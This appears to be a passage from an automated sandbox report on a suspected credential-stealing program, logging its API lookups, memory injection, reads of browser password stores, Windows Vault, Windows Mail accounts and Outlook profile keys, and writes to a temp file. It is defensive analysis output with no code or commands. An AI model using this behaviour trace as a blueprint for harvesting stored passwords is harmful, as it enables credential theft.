Read Value Mozilla Firefox 25.0\bin value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
Read Value Mozilla Firefox 25.0\bin value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
Enumerate Keys - - True 3
Fn
Enumerate Keys - - False 3
Fn
Process (40)
Operation Process Additional Information Success Count Logfile
Get filename c:\windows\system32\dwm.exe file_name = C:\Windows\System32\dwm.exe, flags = PROCESS_NAME_WIN32 True 1
Fn
Get filename c:\windows\explorer.exe file_name = C:\Windows\explorer.exe, flags = PROCESS_NAME_WIN32 True 1
Fn
Get filename c:\program files\microsoft office\root\office16\onenotem.exe file_name = C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE, flags = PROCESS_NAME_WIN32 True 1
Fn
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\taskeng.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskeng.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\program files\microsoft office\root\office16\onenotem.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\wbem\wmiprvse.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\program files (x86)\java\turner_construction_solve_cialis.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\internet explorer\efforts-extreme-quantity-reproductive.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\msbuild\los-talks-ooo-focusing.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\microsoft onedrive\farehave.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\rundll32.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\common files\characters appointed birthday finally.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\msbuild\ausarrivedrepresentative.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows media player\routing.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\dvd maker\cliff-filter.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows defender\canvas.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\common files\cookie_cumulative_bennett_horse.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows sidebar\pie.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft office\located-purple-team.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft office\pagespresent.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\java\diamond_hospitals_designs_www.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\mozilla firefox\later_pet_handjobs.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\internet explorer\instrumentationendorsementcivilizationcommentary.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\common files\literally.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\windows nt\dimensionalsubscriptions.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\common files\eaglesfilterscrimes.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows photo viewer\multimedia-channel-letter-standards.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\java\analysts-dose.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\uninstall information\manufacturer-asset.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft office\root\office16\winword.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppsvc.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\sppsvc.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Module (69)
Operation Module Additional Information Success Count Logfile
Load comctl32.dll base_address = 0x742f0000 True 1
Fn
Load shell32.dll base_address = 0x75c50000 True 1
Fn
Load pstorec.dll base_address = 0x74150000 True 1
Fn
Load vaultcli.dll base_address = 0x740e0000 True 1
Fn
Load C:\Program Files (x86)\Mozilla Firefox\nss3.dll base_address = 0x73eb0000 True 1
Fn
Get Handle private_0x0000000000400000 base_address = 0x400000 True 22
Fn
Get Handle C:\Program Files (x86)\Mozilla Firefox\nss3.dll base_address = 0x0 False 1
Fn
Get Handle c:\program files (x86)\mozilla firefox\nss3.dll base_address = 0x73eb0000 True 2
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x759f0000 True 2
Fn
Get Filename - process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260 True 2
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll function = InitCommonControlsEx, address_out = 0x743109ce True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderPathW, address_out = 0x75c70468 True 1
Fn
Get Address c:\windows\syswow64\pstorec.dll function = PStoreCreateInstance, address_out = 0x7415526c True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultOpenVault, address_out = 0x740e26a9 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultCloseVault, address_out = 0x740e2718 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultEnumerateItems, address_out = 0x740e3099 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultFree, address_out = 0x740e4321 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultGetInformation, address_out = 0x740e24c0 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultGetItem, address_out = 0x740e3242 True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = NSS_Init, address_out = 0x73f6d70b True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = NSS_Shutdown, address_out = 0x73f6d13c True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = PK11_GetInternalKeySlot, address_out = 0x73f03c51 True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = PK11_FreeSlot, address_out = 0x73f03333 True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = PK11_CheckUserPassword, address_out = 0x73eecbc4 True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = PK11_Authenticate, address_out = 0x73eed3ca True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = PK11SDR_Decrypt, address_out = 0x73f000a7 True 2
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_open, address_out = 0x74011ca0 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_prepare, address_out = 0x73f9ce70 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_step, address_out = 0x74005200 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_column_text, address_out = 0x73fbd400 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_column_int, address_out = 0x73fbd3a0 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_column_int64, address_out = 0x73fbd3d0 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_finalize, address_out = 0x73fe9f60 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_close, address_out = 0x73febde0 True 1
Fn
Get Address c:\program files (x86)\mozilla firefox\nss3.dll function = sqlite3_exec, address_out = 0x73fea270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryFullProcessImageNameW, address_out = 0x75a115f7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessTimes, address_out = 0x75a1d60f True 1
Fn
System (1)
Operation Additional Information Success Count Logfile
Get Info type = Operating System False 1
Fn
Ini (28)
Operation Filename Additional Information Success Count Logfile
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = ShowGridLines, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = SaveFilterIndex, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = ShowInfoTip, default_value = 1 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = MarkOddEvenRows, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = ShowTimeInGMT, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = LoadPasswordsIE, default_value = 1 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = LoadPasswordsFirefox, default_value = 1 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = LoadPasswordsChrome, default_value = 1 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = LoadPasswordsOpera, default_value = 1 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = LoadPasswordsSafari, default_value = 1 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = LoadPasswordsSeaMonkey, default_value = 1 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = LoadPasswordsYandex, default_value = 1 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = UseFirefoxProfileFolder, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = UseFirefoxInstallFolder, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = UseChromeProfileFolder, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = UseOperaPasswordFile, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = FirefoxProfileFolder False 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = FirefoxInstallFolder False 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = ChromeProfileFolder False 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = OperaPasswordFile False 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = SaveFileEncoeding, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = WinPos False 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = Columns False 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.cfg section_name = General, key_name = Sort, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile0, key_name = Path, data_out = Profiles/3y2joh8o.default True 1
Fn
Read C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile0, key_name = IsRelative, default_value = 0 True 1
Fn
Read C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile1, key_name = Path False 1
Fn
Read C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini section_name = Profile1, key_name = IsRelative, default_value = 0 True 1
Fn
Process #11: systeminfo.exe
(Host: 179, Network: 0)
Information Value
ID #11
File Name c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe
Command Line "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:08, Reason: Child Process
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:01:15
OS Process Information
Information Value
PID 0x66c
Parent PID 0x81c (c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 660
0x 890
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory Readable True False False
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False
pagefile_0x00000000000e0000 0x000e0000 0x000e0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000000f0000 0x000f0000 0x000f1fff Pagefile Backed Memory Readable True False False
private_0x0000000000100000 0x00100000 0x0010ffff Private Memory Readable, Writable True False False
private_0x0000000000130000 0x00130000 0x0016ffff Private Memory Readable, Writable True False False
private_0x0000000000210000 0x00210000 0x0030ffff Private Memory Readable, Writable True False False
private_0x0000000000360000 0x00360000 0x0039ffff Private Memory Readable, Writable True False False
private_0x0000000000400000 0x00400000 0x0041bfff Private Memory Readable, Writable, Executable True False False
pagefile_0x0000000000420000 0x00420000 0x005a7fff Pagefile Backed Memory Readable True False False
private_0x00000000005c0000 0x005c0000 0x0063ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000640000 0x00640000 0x007c0fff Pagefile Backed Memory Readable True False False
private_0x00000000007e0000 0x007e0000 0x008dffff Private Memory Readable, Writable True False False
private_0x00000000008e0000 0x008e0000 0x009dffff Private Memory Readable, Writable True False False
3292.exe 0x00be0000 0x00bfefff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000c00000 0x00c00000 0x01ffffff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x02000000 0x022cefff Memory Mapped File Readable False False False
private_0x0000000002360000 0x02360000 0x0245ffff Private Memory Readable, Writable True False False
atl.dll 0x74130000 0x74143fff Memory Mapped File Readable, Writable, Executable False False False
pstorec.dll 0x74150000 0x7415cfff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x742f0000 0x7448dfff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x746e0000 0x746e7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x746f0000 0x7474bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74750000 0x7478efff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74dc0000 0x74dcbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74dd0000 0x74e2ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x74e30000 0x74e8ffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x74e90000 0x74ea8fff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x750c0000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x750d0000 0x75126fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75130000 0x751bffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75250000 0x75295fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x752a0000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75450000 0x755abfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x755b0000 0x7564cfff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x756e0000 0x7577ffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x75780000 0x75789fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75790000 0x7588ffff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x758d0000 0x759ecfff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759f0000 0x75afffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x75b00000 0x75bcbfff Memory Mapped File Readable, Writable, Executable False False False
comdlg32.dll 0x75bd0000 0x75c4afff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75c50000 0x76899fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76d80000 0x76e6ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076e70000 0x76e70000 0x76f69fff Private Memory Readable, Writable, Executable True False False
private_0x0000000076f70000 0x76f70000 0x7708efff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77270000 0x773effff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Injection Information
Injection Type Source Process Source Os Thread ID Injection Info Success Count Logfile
Modify Memory #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x84c address = 0x400000, size = 114688 True 1
Fn
Data
Modify Memory #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x84c address = 0x7efde008, size = 4 True 1
Fn
Data
Modify Memory #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x84c address = 0x7efdf010, size = 4 True 1
Fn
Data
Modify Control Flow #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x84c os_tid = 0x660, address = 0x0 True 1
Fn
Host Behavior
File (40)
Operation Filename Additional Information Success Count Logfile
Create C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\ProgramData\FB2F.tmp desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo_lng.ini type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Profiles type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Thunderbird\Profiles type = file_attributes False 1
Fn
Get Info C:\Program Files (x86)\Mozilla Thunderbird type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount type = size True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount size = 1506, size_out = 1506 True 1
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{1CD43F3B-668B-4CA8-B816-34F74122EC0F}.oeaccount size = 670, size_out = 670 True 1
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows Mail\account{AF0DB737-2EF9-4633-BF5E-1A6761ED1577}.oeaccount size = 1734, size_out = 1734 True 1
Fn
Data
Write C:\ProgramData\FB2F.tmp size = 11 True 1
Fn
Data
Write C:\ProgramData\FB2F.tmp size = 1 True 12
Fn
Data
Write C:\ProgramData\FB2F.tmp size = 12 True 1
Fn
Data
Write C:\ProgramData\FB2F.tmp size = 14 True 2
Fn
Data
Write C:\ProgramData\FB2F.tmp size = 5 True 1
Fn
Data
Write C:\ProgramData\FB2F.tmp size = 0 True 4
Fn
Write C:\ProgramData\FB2F.tmp size = 2 True 2
Fn
Data
Write C:\ProgramData\FB2F.tmp size = 4 True 2
Fn
Data
Write C:\ProgramData\FB2F.tmp size = 7 True 1
Fn
Data
Registry (97)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Qualcomm\Eudora\CommandLine - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Classes\Software\Qualcomm\Eudora\CommandLine\current - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Google\Google Desktop\Mailboxes - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Identities - True 1
Fn
Open Key HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} - True 1
Fn
Open Key HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Internet Account Manager\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles - False 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\189cba75c69c634996739bac92103ebb - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1a8bd43e654f65418fbafadeef063a57 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\1cfb96c6c96b454ebff73da2e9f63f51 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\467888fc50a6c6448d6cc0cf7b5307d6 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\48dea081c9634a43a6861907855add5c - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\55aad8d134512d438564aa678cb92d66 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\71b0295bef58e344911262b243f005ac - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 - True 1
Fn
